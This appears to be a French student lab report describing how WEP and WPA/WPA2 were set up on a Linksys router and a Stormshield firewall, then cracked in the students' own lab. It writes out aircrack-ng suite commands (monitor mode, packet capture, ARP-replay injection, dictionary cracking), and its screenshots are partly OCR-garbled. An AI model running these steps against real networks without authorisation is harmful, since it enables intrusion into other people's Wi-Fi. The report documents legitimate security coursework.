### Année 2023-2024

# SAÉ Cyber 4.0 Sécurisation d'un SI

### Tâche 6 Attaque sur le Wifi (4,5 points)

| Liste des personnes impliquées avec pourcentage de répartition |      |
|----------------------------------------------------------------|------|
| Sami                                                           | 100% |

Estimation du temps passé sur cette tâche en heure-homme :

## Objectif : Mettre en place des attaques sur le WEP et sur le WPA avec une Linksys puis avec un SNS

Mise en place du WEP sur Linksys :

Le WEP (Wired Equivalent Privacy) est un protocole de sécurité utilisé pour sécuriser les réseaux sans fil, notamment les réseaux Wi-Fi. Il a été introduit initialement dans la norme IEEE 802.11 pour fournir une sécurité similaire à celle des réseaux filaires. Le but principal du WEP est de crypter les données transmises sur le réseau sans fil afin d'empêcher toute interception non autorisée.

Cependant, le WEP a été critiqué pour ses faiblesses de sécurité. Il utilise un algorithme de chiffrement relativement faible qui peut être facilement compromis avec des attaques telles que l'attaque par force brute ou l'attaque par paquets cryptographiques. En conséquence, le WEP est largement considéré comme obsolète et non sécurisé. De nos jours, il est recommandé d'utiliser des protocoles de sécurité plus robustes comme WPA (Wi-Fi Protected Access) ou WPA2 pour sécuriser les réseaux Wi-Fi.

| ▲ Non sécurisé 10.0.2.1/index.asp                         |                                                  |                                                                                                    |  |  |  |  |
|-----------------------------------------------------------|--------------------------------------------------|----------------------------------------------------------------------------------------------------|--|--|--|--|
| Tube 📓 Maps 🧃 Moodle-Cours Magi 🥡 Espace Numerique 🧿 W    | IMS 📰 Cisco Networking A ᠢ W3Schools 📀 Proxm     | ox 2 🔇 RT-projet 👍 SAE13 Dispositif de                                                                                                    |  |  |  |  |
| dd-wrt.com                                                | "<br>1 control panel                             | Firmware: DD-WRT v24-sp2 (10/10/09) std<br>: 00:04:18 up 4 min, load average: 0.42, 0.25, 0.11<br>WAN IP: 0.0.00                                       |  |  |  |  |
| Setup Wireless Services                                   | Security Access Restrictions NAT / QoS Adminis   | tration Status                                                                                                    |  |  |  |  |
| Basic Setup DDNS MAC Addre                                | ss Clone Advanced Routing VLANs Networking EoIP  | funnel                                                                                                    |  |  |  |  |
| WAN Setup                                                 |                                                  | Help more                                                                                                    |  |  |  |  |
| WAN Connection Type Connection Type                       | Automatic Configuration - DHCP V                 | Automatic Configuration - DHCP:<br>This setting is most commonly used by<br>Cable operators.                                                           |  |  |  |  |
| STP<br>Optional Settings                                  | U Enable 🖲 Disable                               | Host Name:<br>Enter the host name provided by your<br>ISP.                                                                                             |  |  |  |  |
| Router Name<br>Host Name<br>Domain Name                   | Groupe_6                                         | Domain Name:<br>Enter the domain name provided by<br>your ISP.                                                                                         |  |  |  |  |
| МТО                                                       | Auto V 1500                                      | Local IP Address:<br>This is the address of the router.                                                                                                |  |  |  |  |
| Network Setup                                             |                                                  | Subnet Mask:                                                                                                    |  |  |  |  |
| Kouter 1/P<br>Local IP Address<br>Subnet Mask<br>Gateway  | 10, 0, 2, 1<br>255, 255, 255, 0<br>10, 0, 2, 254 | DHCP Server:<br>Allows the router to manage your IP<br>addresses.                                                                                      |  |  |  |  |
| Local DNS                                                 |                                                  | Start IP Address:<br>The address you would like to start<br>with.                                                                                      |  |  |  |  |
| DECP Type<br>DECP Type<br>DECP Server<br>Start IP Address | DHCP Server<br>BEnable  Disable<br>10.0.2. 100   | Maximum DHCP Users:<br>You may limit the number of<br>addresses your router hands out. 0<br>means only predefined static leases<br>will be handed out. |  |  |  |  |
| Maximum DHCP Users                                        | 50                                               | Time Settings:                                                                                                    |  |  |  |  |

J'ai tout d'abord commencé par la configuration de l'adresse IP de notre borne lynksys en le configurant par rapport à notre schéma réseau. Pour cela, je suis allé dans la section 'Setup', puis 'Router IP'. Enfin j'ai changé le SSID du routeur en le nommant Groupe\_6 pour pouvoir l'identifier parmi les autres.

Pour mettre en place un mot de passe tout en utilisant le protocole de sécurité WEP, il faut se rendre dans la section « Wireless » de l'interface de configuration du routeur. Suite à cela il faut se rendre dans l'onglet « Wireless Security ». Dans « Security Mode », j'ai sélectionné la partie « WEP ». Le fait d'avoir sélectionné ce protocole, a permit de pouvoir sélectionner plusieurs réglages tels que la génération de clés et le « Default Transmit Key » et « Encryption » qui nous permettent respectivement de pouvoir choisir la clé qui servira de mot de passe de connexion, et la taille de cryptage de la clé de connexion. J'ai ensuite cliqué sur le bouton « Generate » pour créer automatiquement des clés WEP. J'ai choisi la première clé générée comme mot de passe principal, en m'assurant qu'elle corresponde au numéro de la 'Default Transmit Key' sélectionnée. Cela a permis de sécuriser le réseau en utilisant le protocole WEP, conformément aux spécifications de notre infrastructure réseau.

| dd-wrt.com                            | control panel                            | F<br>Time: 00:05:0 | Firmware: DD-<br>6 up 5 min, lo                           | WRT v24-sp2 (10/10/09) std<br>ad average: 0.19, 0.21, 0.10<br>WAN IP: 0.0.0.0                        |
|---------------------------------------|------------------------------------------|--------------------|-----------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| Setup Wireless Services               | Security Access Restrictions NAT / QoS   | Administration     | Status                                                    |                                                                                                    |
| Basic Settings Radius Wireless Se     | ecurity MAC Filter Advanced Settings WDS |                    |                                                           |                                                                                                    |
| Wireless Security wl0                 |                                          |                    | Неір                                                      | more                                                                                                 |
| Physical Interface wl0 SSID [Groupe_6 | 5] HWAddr [C0:56:27:19:B4:E8]            |                    | Security M                                                | ode:                                                                                                 |
| Security Mode<br>Default Transmit Key | WEP                                      |                    | You may cho<br>WPA Persona<br>RADIUS. All<br>must use the | ose from Disable, WEP,<br>al, WPA Enterprise, or<br>devices on your network<br>e same security mode. |
| Encryption                            | 64 bits 10 hex digits 🗸                  |                    |                                                           |                                                                                                    |
| Passphrase                            | Generate                                 |                    |                                                           |                                                                                                    |
| Key 1                                 | 000000000                                |                    |                                                           |                                                                                                    |
| Key 2                                 | 000000000                                |                    |                                                           |                                                                                                    |
| Key 3                                 | 000000000                                |                    |                                                           |                                                                                                    |
| Key 4                                 | 000000000                                |                    |                                                           |                                                                                                    |
|                                       |                                          |                    |                                                           |                                                                                                    |
|                                       | Save Apply Settings                      |                    |                                                           |                                                                                                    |

Cassage de la clé WEP sur linksys :

Pour débuter le processus de craquage d'un mot de passe WEP, j'ai utilisé le logiciel Aircrackng. J'ai lancé son installation sur mon système en exécutant la commande " apt-get install aircrack-ng" dans le terminal. Une fois le logiciel installé, j'ai utilisé la commande " airmon-ng" pour répertorier les interfaces réseau sans fil disponibles sur mon système. Cette étape était cruciale pour identifier l'interface que j'allais utiliser pour tenter de casser le mot de passe WEP.

|         |                      |                  | Terminal                                                                                                    |
|---------|----------------------|------------------|----------------------------------------------------------------------------------------------------|
| Fichier | Édition Affichage Re | cherche Terminal | Aide                                                                                                    |
|         |                      |                  |                                                                                                    |
|         |                      |                  |                                                                                                    |
|         |                      |                  |                                                                                                    |
|         |                      |                  |                                                                                                    |
|         |                      |                  |                                                                                                    |
|         |                      |                  |                                                                                                    |
|         |                      |                  | Intel Corporation Device Slf0 (rev 01)<br>ode vif enabled for [phy0⊫lp0s20f3mon]<br>ode vif disabled for [phy0]wlp0s20f3) |
|         |                      |                  |                                                                                                    |

Comme on peut le voir suite à cette commande, L'interface utilisée pour le réseau sans fil c'est à dire réseau wi fi est wlp0s20f3. Après avoir pris connaissance de l'interface utilisée, on va mettre par la suite en place le mois de moniteur qui est essentiel pour notre utilisation c'est à dire casser le mot de passe WEP. Ce dernier permet de surveiller tous les paquets de données qui circulent autour de nous.

Suite à cela pour identifier la liste des réseaux wifi disponibles autour de nous j'ai tapé la commande airodump-ng wlp0s20f3mon. Cette liste contenait des données cruciales telles que le BSSID (adresse MAC du point d'accès), l'ESSID (nom du réseau), le canal utilisé par le réseau, ainsi que le type de sécurité mis en place pour chaque réseau. En me basant sur l'ESSID pour repérer les réseaux, j'ai identifié Groupe\_6 comme le réseau cible pour lequel je voulais évaluer la sécurité WEP ( qui est le wifi de notre routeur lynksys).

| D Applications Emplacer   | nents Système                                                                                                    |                                                                                                    | 📑 🚅 🔓 mer. 3 avril, 16:52 |
|---------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|---------------------------|
|                           |                                                                                                    | Terminal                                                                                                    | • • *                     |
| Fichier Édition Affichage | Recherche Terminal                                                                                               | Aide                                                                                                    |                           |
|                           |                                                                                                    | <pre>f. 15 the source MMC associated ? t. 15 the source MMC associated ? t. 15 the source MMC associated ? t. 15 the source MMC associated ? t. 15 the source MMC associated ? t. 15 the source MMC associated ? t. 15 the source MMC associated ? sts and 15% ACK), sent 36406 packet?, (498 pps) 2013mon</pre> |                           |
|                           |                                                                                                    | Chipset                                                                                                    |                           |
|                           |                                                                                                    |                                                                                                    |                           |
|                           |                                                                                                    |                                                                                                    | 0                         |
| # BSSID                   |                                                                                                    |                                                                                                    |                           |
|                           |                                                                                                    |                                                                                                    |                           |
|                           | and the second second second second second second second second second second second second second second second |                                                                                                    |                           |

| Applications Emplacem                                                                       | nents Sys | tème           |     |          |    |                            |        | 📑 🙀 mer. 3 avril, 16:36 |
|---------------------------------------------------------------------------------------------|-----------|----------------|-----|----------|----|----------------------------|--------|-------------------------|
|                                                                                             |           |                |     |          |    | Te                         | rminal |                         |
| Fichier Édition Affichage                                                                   | Recherc   | the Terminal A | ide |          |    |                            |        |                         |
|                                                                                             |           |                |     |          |    |                            |        | Î                       |
|                                                                                             |           |                |     |          |    |                            |        |                         |
|                                                                                             |           |                |     |          |    |                            |        |                         |
|                                                                                             |           |                |     |          |    |                            |        |                         |
| (not associated)<br>00:16:65:58:67:A4<br>16:02:53:60:36:79<br>Ouitting<br>root@rt-mob:-# [] |           |                |     |          |    | 9 <b>b</b> 9<br>8 6<br>8 7 |        |                         |
| Terminal                                                                                    | Ro        | Bureau         | 1   | ter Bure | au |                            |        |                         |

Suite à cela j'ai donc choisi le réseau cible avec son PC et j tapé la commande suivante qui me permet De voir quels appareils sont connectés à ce réseau et d'ainsi par la suite pouvoir capturer toutes les trames nécessaires pour craquer le mot de passe : airodump-ng -c 6 -bssid C0 :56 :27 :19 :B4 :E8 -w /home/tp/Bureau wlp0s20f3mon. Ici -c 6 signifie le canal de notre réseau. --bssid C0 :56 :27 :19 :B4 :E8 est l'identifiant de notre routeur sur le réseau, c'est grâce à cela que l'on va pouvoir récupérer les trames spécifiques à ce routeur. -w /home/tp/Bureau wlp0s20f3mon correspond à l'emplacement où nos données capturées seront enregistrées.

| Discretions Emplacem      | nents Système           |          |
|---------------------------|-------------------------|----------|
| ○                         |                         | Terminal |
| Fichier Édition Affichage | Recherche Terminal Aide |          |
|                           |                         |          |
|                           |                         |          |
|                           |                         |          |
|                           |                         |          |
|                           |                         |          |

#### L'image ci-dessous correspond aux données capturées

|                   |               |          |         |             | Terminal |         |        |         | <ul> <li>(*)</li> </ul> | ~ ×  |
|-------------------|---------------|----------|---------|-------------|----------|---------|--------|---------|-------------------------|------|
| Fichier Édi       | tion Affichag | ge Reche | erche 1 | erminal Aid | e        |         |        |         |                         |      |
| root@rt-ı<br>3mon | mob:~# ai     | replay   | -ng -   | 3 -b C0:5   | 6:27:19: | B4:E8 - | c B4:8 | 3C : 9[ | D:92:CA:B9 wlp0s        | 520f |
| No source         | e MAC (-h     | ) spec   | ified   | . Using t   | he devid | e MAC ( | 3C:21: | 90:9    | 9F:4B:EC)               |      |
| 16:42:13          | Waiting       | for b    | eacon   | frame (B    | SSID: CO | :56:27: | 19:B4: | :E8)    | on channel 6            |      |
| Saving A          | RP reques     | ts in    | repla   | y arp-040   | 3-164213 | .cap    |        |         |                         |      |
| You shou          | ld also s     | tart a   | irodu   | mp-ng to    | capture  | replies |        |         |                         |      |
| Notice:           | got a dea     | uth/di   | sasso   | c packet    | Is the   | source  | MAC as | soc     | iated ?                 |      |
| Read 118          | 6 packets     | (got     | 1 ARP   | requests    | and 316  | ACKs),  | sent   | 446     | packets(499             | pps  |
| Read 165          | 9 packets     | (got     | 3 ARP   | requests    | and 447  | ACKs),  | sent   | 496     | packets(499             | pps  |
| Read 197          | 7 packets     | (got     | 3 ARP   | requests    | and 555  | ACKs),  | sent   | 546     | packets(499             | pps  |
| Read 224          | 6 packets     | (got     | 3 ARP   | requests    | and 622  | ACKs),  | sent   | 597     | packets(500             | pps  |
| Read 253          | 5 packets     | (got     | 3 ARP   | requests    | and 685  | ACKs),  | sent   | 646     | packets(499             | pps  |
| Read 260          | 2 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 696     | packets(499             | pps  |
| Read 266          | 2 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 747     | packets(500             | pps  |
| Read 267.         | 2 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 797     | packets(500             | pps  |
| Read 268          | 6 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 846     | packets(499             | pps  |
| Read 271          | 5 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 896     | packets(499             | pps  |
| Read 279          | 0 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 947     | packets(500             | pps  |
| Read 281          | 6 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 996     | packets(499             | pps  |
| Read 285          | 8 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 1047    | 7 packets(500           | pp   |
| Read 291          | 6 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 1097    | 7 packets(500           | ) pp |
| Read 293          | 7 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 1146    | 5 packets(499           | pp   |
| Notice:           | got a dea     | uth/di   | sasso   | c packet.   | Is the   | source  | MAC as | soc     | iated ?                 |      |
| Read 296          | 0 packets     | (got     | 3 ARP   | requests    | and 693  | ACKs),  | sent   | 119     | 7 packets(500           | gg ( |

Suites aux données capturées on stop la commande airmon-ng sur notre interface en mode moniteur et on lance le cassage de mode du wifi cible grâce à la commande aircrack-ng /home/tp/Bureau/\*.cap. Ce qui nous donne ce résultat :

|           |               |               |            | Terminal |   | $\odot \odot \otimes$ |
|-----------|---------------|---------------|------------|----------|---|-----------------------|
| Fichier É | dition Affich | age Recherche | Terminal A | ide      |   |                       |
|           |               |               |            |          |   | î                     |
|           |               |               |            |          |   |                       |
|           |               |               |            |          |   |                       |
|           | -mob:-#       | ]             |            | 1        | g | n                     |

Mise en place du WPA :

Le WPA (Wi-Fi Protected Access) est un protocole de sécurité utilisé pour sécuriser les réseaux sans fil Wi-Fi. Il offre un cryptage amélioré par rapport au protocole précédent, le WEP, ainsi qu'une authentification renforcée. Le WPA évolue continuellement pour améliorer la sécurité et est compatible avec les anciens équipements.

| dd-wrt.com                                                               | irmware: DD<br>0 up 3 min, l                                                  | 0-WRT v24-sp2 (10/10/09) std<br>load average: 0.04, 0.15, 0.07<br>WAN IP: 0.0.00 |                                                                                                    |      |      |  |  |  |  |  |  |
|--------------------------------------------------------------------------|-------------------------------------------------------------------------------|----------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|------|------|--|--|--|--|--|--|
| Setup Wireless Services                                                  | Setup Wireless Services Security Access Restrictions NAT / QoS Administration |                                                                                  |                                                                                                    |      |      |  |  |  |  |  |  |
| Basic Settings Radius Wireless S                                         | ecurity MAC Filter A                                                          | dvanced Settings WDS                                                             | ;                                                                                                    |      |      |  |  |  |  |  |  |
| Wireless Security wl0                                                    |                                                                               |                                                                                  |                                                                                                    | Help | more |  |  |  |  |  |  |
| Physical Interface wl0 SSID [Groupe_d<br>Security Mode<br>WPA Algorithms |                                                                               | Security M<br>You may ch<br>WPA Persor<br>RADIUS. All<br>must use th             | <b>tode:</b><br>noose from Disable, WEP,<br>nal, WPA Enterprise, or<br>I devices on your network<br>ne same security mode. |      |      |  |  |  |  |  |  |
| WPA Shared Key<br>Key Renewal Interval (in seconds)                      |                                                                               |                                                                                  |                                                                                                    |      |      |  |  |  |  |  |  |
|                                                                          | Save Apply Setting                                                            | S                                                                                |                                                                                                    |      |      |  |  |  |  |  |  |

ci-dessus nous avons la configuration du WPA où l'on doit insérer une clé de connexion de notre choix.

Pour déchiffrer la clé pré-partagée WPA, j'ai suivi exactement le même protocole, à l'exception de la dernière étape où la commande "aircrack-ng" nécessitait l'utilisation d'un dictionnaire. J'ai donc créé un petit dictionnaire à cet effet. Voici la clé trouvée par le logiciel

|                |             |                      |                      |                      | Air                  | ora                  | sk-i                 | ng :                 | 1.6                  |                      |                      |                      |                      |                      |                      |                      |                      |  |
|----------------|-------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|--|
| [00:00:00] 87/ | <b>'103</b> | 3037                 | 727                  | ke                   | ys i                 | test                 | ted                  | (73                  | 37.1                 | 64 H                 | (/s                  | )                    |                      |                      |                      |                      |                      |  |
| Time left: 3 k | nour        | s,                   | 52                   | mi                   | nuti                 | es,                  | 48                   | sec                  | con                  | ds                   |                      |                      |                      |                      |                      | 0.0                  | 00%                  |  |
|                |             |                      | KI                   | EYI                  | FOU                  | ND !                 | [ :                  | 1234                 | 456                  | 78                   | ]                    |                      |                      |                      |                      |                      |                      |  |
| Master Key     |             | BA<br>E6             | C6<br>59             | 81<br>A6             | 6E<br>114            | B1<br>76             | 01<br>F8             | B5<br>61             | 54<br>22             | 6B<br>59             | 57<br>C7             | A2<br>BA             | 3F<br>10             | 31<br>0D             | 01<br>D0             | 4A<br>1B             | OC<br>EA             |  |
| Transient Key  |             | CB<br>E2<br>E1<br>1F | 11<br>F5<br>16<br>B9 | 48<br>46<br>D5<br>2A | 1F<br>A9<br>B9<br>7F | E3<br>4B<br>10<br>15 | AD<br>14<br>5B<br>1A | 73<br>80<br>14<br>DC | 14<br>B7<br>56<br>30 | AB<br>82<br>DE<br>CA | 58<br>49<br>D4<br>90 | B5<br>3F<br>E0<br>17 | 5F<br>14<br>A1<br>02 | EE<br>92<br>B5<br>1F | D5<br>5B<br>E7<br>00 | 0B<br>FB<br>4C<br>00 | 12<br>B3<br>16<br>00 |  |
| EAPOL HMAC     |             | 29                   | 19                   | Ĥ1                   | 55                   | AC                   | 80                   | 76                   | 5A                   | 1B                   | 08                   | 8F                   | 2C                   | 67                   | C5                   | 73                   | 84                   |  |

Normalement, le dictionnaire est généralement plus volumineux, ce qui entraîne des temps de craquage de mot de passe beaucoup plus longs. Si le mot de passe ne figure pas dans le dictionnaire, l'attaque échoue.

#### Mise en place du WPA sur Stormshield SNS :

NB : Il n'y a pas de WEP sur stormshield ainsi que WPA étant donné qu'il est affiché en tant que WPA2.

J'ai donc premièrement activé le wifi sur notre Stormshield B:

| $\leftarrow \rightarrow \mathbf{C} \ \textcircled{a}$ | O 🖧 ht                     | ps:// <b>10.0.0.254</b> /admin/admin.html?nc=1712583688217#wifimodule | 80% ☆ |
|-------------------------------------------------------|----------------------------|-----------------------------------------------------------------------|-------|
| 🐂 Kali Linux 📪 Kali Tools 🛔                           | 💆 Kali Docs 🛛 💐 Kali       | Forums  Kali NetHunter 🛸 Exploit-DB 🛸 Google Hacking DB 🥼 OffSec      |       |
| STORMSHIELD                                           | SN210W 3.                  | 2210W17C2187A7 1 admin<br>20 Pead Write<br>Restricted access to logs  |       |
| CONFIGURATION -                                       | wi-Fi                      |                                                                       |       |
| Search × 🗐 🗂                                          | ON                         |                                                                       |       |
| Cashboard                                             |                            |                                                                       |       |
| SYSTEM                                                | General configuration      |                                                                       |       |
| S NETWORK                                             | Scan frequency:            | Always enabled V P4                                                   |       |
| Interfaces                                            | Mode:                      | 802.11g/n (2.4 GHz frequency range)                                   |       |
| • Wi-Fi                                               |                            |                                                                       |       |
| Virtual interfaces                                    | Channel configuration      |                                                                       |       |
| Routing                                               | Country                    | France                                                                |       |
| <ul> <li>Multicast routing</li> </ul>                 | Country.                   |                                                                       |       |
| Dynamic DNS                                           | Channel:                   |                                                                       |       |
| DHCP                                                  | Tx power:                  | 20dBm                                                                 |       |
| DNS cache proxy                                       |                            | 94)                                                                   |       |
| OBJECTS                                               | Configuring the access poi |                                                                       |       |
| Q USERS                                               |                            |                                                                       |       |
| SECURITY POLICY                                       |                            |                                                                       |       |
| Filter - NAT                                          |                            |                                                                       |       |
| URL filtering                                         |                            |                                                                       |       |
| <ul> <li>SSL filtering</li> </ul>                     |                            |                                                                       |       |
| <ul> <li>SMTP filtering</li> </ul>                    |                            |                                                                       |       |
| • QoS                                                 |                            |                                                                       |       |
| Implicit rules                                        |                            |                                                                       |       |
| O APPLICATION PROTECTION                              |                            |                                                                       |       |
| S NETWORK OBJECTS +                                   |                            |                                                                       |       |
| LUSERS AND GROUPS +                                   |                            |                                                                       |       |
| MONITORING +                                          |                            | Apply Kancel                                                          |       |

Puis j'ai activé l'interface wifi avec le chiffrement WPA2 :

| ← → C @                                | 🔿 🔓 https://10            | .0.0.254/admin/admin.html?nd                            | c=1712583688217#network                       |                       | 80% 🏠 |
|----------------------------------------|---------------------------|---------------------------------------------------------|-----------------------------------------------|-----------------------|-------|
| 🛰 Kali Linux 🛛 🔒 Kali Tools 🖉          | Kali Docs 🛛 🐹 Kali Forums | 🤜 Kali NetHunter 🔺 Exploit                              | -DB 🐞 Google Hacking DB 🥼 OffS                | ec                    |       |
| STORMSHIELD                            | SN210W 3.7.20             | 87A7 Admin<br>P Read/Write<br>Restricted access to logs |                                               |                       | 4     |
|                                        | ST. INTERFACES            |                                                         |                                               |                       |       |
| Search × 🔳 🛍                           | Search × + Ad             | dd 🕶 🖸 Delete   🧰 📆   Mixed view 🕶 Show a               | ll 🔹 💿 Check usage                            |                       |       |
| DASHBOARD                              | b et bridge               | CONFIGURATION OF THE INTERFAC                           | æ 🔤                                           |                       |       |
| ( SYSTEM                               | in out                    | Name -                                                  | ufformer (                                    |                       |       |
| S NETWORK                              | WifiGroupe6               | Comments :                                              | willGroupeo                                   |                       |       |
| Interfaces                             | PublicAP                  | VII ANE attached to the interface :                     |                                               |                       |       |
| • Wi-Fi                                |                           | Color:                                                  |                                               |                       |       |
| <ul> <li>Virtual interfaces</li> </ul> |                           | This interface is -                                     | internet forestanted                          |                       |       |
| Routing                                |                           | THE HIGHLIG .                                           | Internal (protected)                          |                       |       |
| <ul> <li>Multicast routing</li> </ul>  |                           | WiFi                                                    |                                               |                       |       |
| Dynamic DNS                            |                           | Network name :                                          | WifiGroupe6                                   |                       |       |
| DHCP                                   |                           | Authentication :                                        | WPA2                                          |                       |       |
| DNS cache proxy                        |                           | Security key :                                          |                                               |                       |       |
| OBJECTS                                |                           |                                                         | AP Isolation                                  |                       |       |
| Q USERS                                |                           |                                                         |                                               |                       |       |
| SECURITY POLICY                        |                           | Address range                                           |                                               |                       |       |
| Filter - NAT                           |                           |                                                         | <ul> <li>None (interface disabled)</li> </ul> |                       |       |
| URL filtering                          |                           |                                                         | Fixed IP (static)                             |                       |       |
| SSL filtering                          |                           |                                                         | O Address range inherited from the bridge     |                       |       |
| SMTP filtering                         |                           |                                                         | Seloct a bridge                               |                       |       |
| • QoS                                  |                           | + Add 🖸 Delete                                          |                                               |                       |       |
| Implicit rules                         |                           | IP address                                              |                                               | Network mask Comments |       |
| APPLICATION PROTECTION                 |                           | 172.20.0.254                                            |                                               | 255.255.255.0         |       |
| R NETWORK OBJECTS +                    |                           |                                                         |                                               |                       |       |
| LUSERS AND GROUPS +                    |                           |                                                         | ( strate) ( the con-                          | nal ]                 |       |
| MONITORING +                           |                           |                                                         | Can                                           |                       |       |

La procédure est exactement la même que pour la WPA

| 0       | Terminal                    |     |                      |                      |                      |                      |                      |                      |                      |                      |                                   |                      | $\odot$              | ×                    |                      |                      |                      |                      |  |   |
|---------|-----------------------------|-----|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|-----------------------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|----------------------|--|---|
| Fichier | Édition Affichage I         | Rec | herch                | ne T                 | erm                  | inal                 | Aid                  | e                    |                      |                      |                                   |                      |                      |                      |                      |                      |                      |                      |  |   |
|         |                             |     |                      |                      | ,                    | Air                  | cra                  | ck-I                 | ng                   | 1.6                  |                                   |                      |                      |                      |                      |                      |                      |                      |  | ĺ |
|         | [00:00:00] 5/1              | 1   | key                  | s to                 | este                 | ed                   | (22)                 | 2.3                  | 2 k,                 | /s)                  |                                   |                      |                      |                      |                      |                      |                      |                      |  |   |
|         | Time left: 0 s              | ec  | ond                  | S                    |                      |                      |                      |                      |                      |                      |                                   |                      |                      |                      |                      |                      | 45.4                 | 45%                  |  |   |
|         |                             |     |                      | K                    | EY I                 | Foui                 | ND !                 | [                    | hih:                 | ihil                 | na!                               | ]                    |                      |                      |                      |                      |                      |                      |  |   |
|         | Master Key                  | :   | A9<br>F9             | DF<br>82             | 80<br>8C             | 21<br>A9             | 79<br>40             | 3B<br>E6             | 33<br>75             | 85<br>2A             | B4<br>30                          | E1<br>99             | C9<br>D4             | 0A<br>8B             | 06<br>31             | 93<br>D7             | DE<br>11             | 21<br>E6             |  |   |
|         | Transient <mark>K</mark> ey | :   | CC<br>91<br>08<br>F7 | DD<br>AE<br>37<br>D2 | FE<br>EA<br>9F<br>DA | B5<br>2D<br>25<br>31 | 3A<br>B7<br>44<br>BD | 28<br>48<br>0B<br>91 | 5F<br>5A<br>C1<br>46 | 89<br>D7<br>18<br>F6 | 9E<br>BB<br>D6 <sup>3</sup><br>B5 | AF<br>34<br>B8<br>DD | 97<br>FA<br>04<br>D2 | D7<br>26<br>74<br>B6 | 43<br>63<br>B2<br>57 | 0D<br>0C<br>AF<br>45 | 85<br>1C<br>60<br>56 | 81<br>F8<br>13<br>CE |  |   |
|         | EAPOL HMAC                  | :   | 24                   | AE                   | 33                   | 5C                   | CF                   | 53                   | E8                   | 53                   | 09                                | 20                   | 17                   | C1                   | E7                   | 7E                   | C7                   | AO                   |  |   |
| root@   | irt-mob:~#                  |     |                      |                      |                      |                      |                      |                      |                      |                      |                                   |                      |                      |                      |                      |                      |                      |                      |  |   |

Voici donc le résultat.